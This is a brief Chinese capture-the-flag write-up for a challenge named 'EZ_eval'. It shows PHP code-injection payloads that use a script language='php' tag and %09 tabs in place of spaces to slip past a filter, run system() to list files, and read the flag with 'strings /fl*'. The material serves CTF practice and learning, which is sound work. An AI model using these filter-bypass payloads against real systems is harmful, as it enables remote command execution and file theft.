EZ_eval

这里发现script没有被禁用,%09代替空格构造payload：

?word=<script%09language=’php’>system(‘ls%09/‘)

发现flag文件

尝试?word=<script%09language=’php’>system(‘ct%09flg’)

好像不行，这里直接读取文件内容

<script%09language=’php’>system(‘strings%09/fl*’)

得到flag